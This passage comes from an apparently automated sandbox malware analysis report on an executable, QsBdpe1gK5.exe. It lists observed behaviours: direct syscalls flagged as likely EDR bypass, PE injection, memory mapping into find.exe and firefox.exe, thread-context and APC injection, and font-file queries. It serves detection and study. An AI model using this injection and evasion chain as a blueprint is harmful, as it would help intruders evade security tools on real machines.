                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0117CA11 mov eax, dword ptr fs:[00000030h]2_2_0117CA11
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01114A35 mov eax, dword ptr fs:[00000030h]2_2_01114A35
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01114A35 mov eax, dword ptr fs:[00000030h]2_2_01114A35
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112CA24 mov eax, dword ptr fs:[00000030h]2_2_0112CA24
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111EA2E mov eax, dword ptr fs:[00000030h]2_2_0111EA2E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100A5B mov eax, dword ptr fs:[00000030h]2_2_01100A5B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01100A5B mov eax, dword ptr fs:[00000030h]2_2_01100A5B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6A50 mov eax, dword ptr fs:[00000030h]2_2_010F6A50
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6A50 mov eax, dword ptr fs:[00000030h]2_2_010F6A50
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6A50 mov eax, dword ptr fs:[00000030h]2_2_010F6A50
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6A50 mov eax, dword ptr fs:[00000030h]2_2_010F6A50
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6A50 mov eax, dword ptr fs:[00000030h]2_2_010F6A50
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6A50 mov eax, dword ptr fs:[00000030h]2_2_010F6A50
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F6A50 mov eax, dword ptr fs:[00000030h]2_2_010F6A50
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116CA72 mov eax, dword ptr fs:[00000030h]2_2_0116CA72
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0116CA72 mov eax, dword ptr fs:[00000030h]2_2_0116CA72
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119EA60 mov eax, dword ptr fs:[00000030h]2_2_0119EA60
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112CA6F mov eax, dword ptr fs:[00000030h]2_2_0112CA6F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112CA6F mov eax, dword ptr fs:[00000030h]2_2_0112CA6F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112CA6F mov eax, dword ptr fs:[00000030h]2_2_0112CA6F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01128A90 mov edx, dword ptr fs:[00000030h]2_2_01128A90
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA80 mov eax, dword ptr fs:[00000030h]2_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA80 mov eax, dword ptr fs:[00000030h]2_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA80 mov eax, dword ptr fs:[00000030h]2_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA80 mov eax, dword ptr fs:[00000030h]2_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA80 mov eax, dword ptr fs:[00000030h]2_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA80 mov eax, dword ptr fs:[00000030h]2_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA80 mov eax, dword ptr fs:[00000030h]2_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA80 mov eax, dword ptr fs:[00000030h]2_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FEA80 mov eax, dword ptr fs:[00000030h]2_2_010FEA80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C4A80 mov eax, dword ptr fs:[00000030h]2_2_011C4A80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8AA0 mov eax, dword ptr fs:[00000030h]2_2_010F8AA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F8AA0 mov eax, dword ptr fs:[00000030h]2_2_010F8AA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory written: C:\Users\user\Desktop\QsBdpe1gK5.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: NULL target: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\find.exeThread register set: target process: 7880Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\find.exeThread APC queued: target process: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess created: C:\Users\user\Desktop\QsBdpe1gK5.exe "C:\Users\user\Desktop\QsBdpe1gK5.exe"Jump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: oPkpFmCiYVL.exe, 00000003.00000002.4126710429.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000000.1767984345.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126997954.00000000015B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: oPkpFmCiYVL.exe, 00000003.00000002.4126710429.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000000.1767984345.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126997954.00000000015B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: oPkpFmCiYVL.exe, 00000003.00000002.4126710429.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000000.1767984345.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126997954.00000000015B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: oPkpFmCiYVL.exe, 00000003.00000002.4126710429.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000000.1767984345.0000000001540000.00000002.00000001.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126997954.00000000015B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Users\user\Desktop\QsBdpe1gK5.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
